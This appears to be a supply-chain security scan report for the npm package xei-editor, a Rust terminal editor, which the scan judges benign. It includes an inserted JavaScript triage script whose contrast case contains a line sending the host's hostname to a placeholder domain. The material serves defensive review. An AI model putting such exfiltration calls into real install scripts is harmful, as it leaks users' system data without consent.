xei-editor@0.1.4

xei (晴) — a modern Vim-like terminal editor in Rust

AI Security Review

scanned 8h ago · by lpm-firewall-ai

No confirmed malicious attack surface was found. The package ships and exposes a native terminal editor binary; its postinstall script appears intended to fetch a matching binary from the package's own GitHub releases, but the script is broken before it can do so, and its only endpoint is package-aligned (it points at that same repository).

Static reason
One or more suspicious static signals were detected.
Trigger
npm install postinstall, or user runs xei CLI
Impact
User-invoked editor may read/write files the user opens; no unconsented exfiltration or persistence found.
Mechanism
Native CLI editor shipped with a postinstall binary downloader that is broken and package-aligned (its download URL is under the package's own GitHub repository)
Rationale
Static inspection found suspicious packaging primitives, but they are consistent with a Rust terminal editor distributed through npm and no concrete malicious behavior was present. The install hook is broken before it can download or write the binary, and the only network endpoint is the package's GitHub release path.
Evidence
  • package.json
  • install.js
  • bin/xei
  • README.md
  • ~/.xei.toml
Network endpoints (2)
  • github.com/stremtec/xei/releases/download/v0.1.4/xei-${target}${EXE}.gz
  • git+https://github.com/stremtec/xei.git
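The report's static signals (an install-time lifecycle script, URL strings in that script, and whether each endpoint is "package-aligned", i.e. lives under the repository named in the manifest) can be reproduced with a short triage script. The block below is an added example, not code from xei-editor, from the scanner, or from any project; the manifest and install script it inspects are constructed stand-ins that carry only the fields and URL pattern cited in this report, the allowlist of accepted lifecycle commands is hypothetical, and example.net is a placeholder for a foreign endpoint. The severities it assigns are its own approximation of the report's scheme.

```javascript
// Added example (not xei-editor's install.js and not the scanner's code): static
// triage of an npm package's install-time lifecycle scripts and URL strings.
// Every input below is a constructed stand-in, not the package's real files.

const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
// Hypothetical allowlist: lifecycle commands a reviewer accepts without review.
const ALLOWLISTED_CMDS = new Set(["node-gyp rebuild"]);
// URL literals in source text; stops at whitespace, quotes, backticks, ) and ].
const URL_RE = /https?:\/\/[^\s"'`)\]]+/g;

// Lifecycle scripts that run at install time, read from the manifest.
function lifecycleScripts(pkg) {
  const scripts = pkg.scripts || {};
  return INSTALL_HOOKS.filter((h) => h in scripts).map((h) => ({ hook: h, cmd: scripts[h] }));
}

// "host/owner/repo" derived from the manifest's repository field (git+ prefix and .git suffix stripped).
function repoSlug(pkg) {
  let url = typeof pkg.repository === "string" ? pkg.repository : (pkg.repository || {}).url;
  if (!url) return null;
  url = url.replace(/^git\+/, "").replace(/\.git$/, "");
  const u = new URL(url);
  return u.host + u.pathname.replace(/\/$/, "");
}

// Distinct URL literals found in a script's source text.
function extractUrls(src) {
  return [...new Set(src.match(URL_RE) || [])];
}

// A URL is package-aligned when its host+path sits under the repository slug.
function classifyUrl(url, slug) {
  const u = new URL(url);
  const key = u.host + u.pathname;
  const aligned = slug !== null && (key === slug || key.startsWith(slug + "/"));
  return { url, host: u.host, aligned };
}

// Findings in roughly the report's shape: severity, title, file, detail.
function triage(pkg, installSrc, installFile = "install.js") {
  const findings = [];
  const slug = repoSlug(pkg);
  for (const { hook, cmd } of lifecycleScripts(pkg)) {
    findings.push({ severity: "High", title: "Install Time Lifecycle Scripts", file: "package.json", detail: `scripts.${hook} = ${cmd}` });
    if (!ALLOWLISTED_CMDS.has(cmd)) {
      findings.push({ severity: "Medium", title: "Ambiguous Install Lifecycle Script", file: "package.json", detail: `scripts.${hook} = ${cmd}` });
    }
  }
  const endpoints = extractUrls(installSrc).map((u) => classifyUrl(u, slug));
  for (const e of endpoints) {
    findings.push({
      severity: e.aligned ? "Low" : "Medium",
      title: e.aligned ? "Package-aligned Network Endpoint" : "Foreign Network Endpoint",
      file: installFile,
      detail: e.url,
    });
  }
  return { slug, endpoints, findings };
}

// Constructed manifest (hypothetical; only the fields this report cites).
const pkg = {
  name: "xei-editor",
  version: "0.1.4",
  bin: { xei: "bin/xei" },
  scripts: { postinstall: "node install.js" },
  repository: { type: "git", url: "git+https://github.com/stremtec/xei.git" },
};

// Constructed install script: a stand-in for the release-download pattern the
// report describes. This is NOT the package's shipped install.js.
const alignedSrc = [
  'const https = require("https");',
  'const base = "https://github.com/stremtec/xei/releases/download/v0.1.4/";',
  'https.get(base + "xei-" + target + EXE + ".gz", (res) => res.pipe(process.stdout));',
].join("\n");

// Constructed contrast case: same shape plus an endpoint outside the repository
// (example.net is a placeholder, not a real endpoint from any package).
const foreignSrc = alignedSrc + '\nhttps.get("https://example.net/collect?h=" + require("os").hostname());';

function report(result) {
  for (const f of result.findings) console.log(`${f.severity.padEnd(6)} ${f.title} (${f.file}): ${f.detail}`);
}

if (typeof require !== "undefined" && require.main === module) {
  report(triage(pkg, alignedSrc));
  console.log("---");
  report(triage(pkg, foreignSrc));
}
```

The alignment check is the part that matters for the verdict above: a lifecycle script that downloads from its own repository's release path is a common (if risky) distribution pattern for native binaries, while the same script pulling from an unrelated host is the signal that warrants blocking. Note that alignment is only as trustworthy as the `repository` field itself, which the publisher controls, so it narrows review rather than replacing it.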

Decision evidence

Public snapshot: the AI classifier called this package Clean (verdict: Benign) at 86.0% confidence, with low false-positive risk.
Evidence for block
  • package.json defines postinstall: node install.js
  • install.js contains package-aligned HTTPS download logic for a GitHub release binary
  • bin/xei is a shipped native Mach-O arm64 executable
Evidence against
  • install.js only references github.com/stremtec/xei release URL and local bin/ path
  • No source references to credential harvesting, shell startup/VCS hooks, AI-agent control files, or exfiltration endpoints
  • install.js has coding errors that stop it before any network request or file write: EXE is referenced before it is initialized, and the platform/arch helpers are never called
  • Binary strings show terminal editor/crossterm/editor-related content, with no suspicious URLs or secret paths found
  • README describes a Vim-like terminal editor and persistence only for package config ~/.xei.toml
Behavioral surface
  • Source: Filesystem, Network
  • Supply chain: Url Strings
  • Manifest: no manifest risk signals triggered
Scanned 1 file(s), 1.72 KB of source; external domains: github.com

Source & flagged code

3 flagged

package.json
scripts.postinstall = node install.js
High · Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.

package.json
scripts.postinstall = node install.js
Medium · Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.

bin/xei
path = bin/xei · kind = native_binary · sizeBytes = 989520 · magicHex = [redacted]
Medium · Ships Native Binary
Package ships native binary artifacts.

Findings

1 High · 3 Medium · 3 Low
  • High · Install Time Lifecycle Scripts · package.json
  • Medium · Ambiguous Install Lifecycle Script · package.json
  • Medium · Network
  • Medium · Ships Native Binary · bin/xei
  • Low · Scripts Present
  • Low · Filesystem
  • Low · Url Strings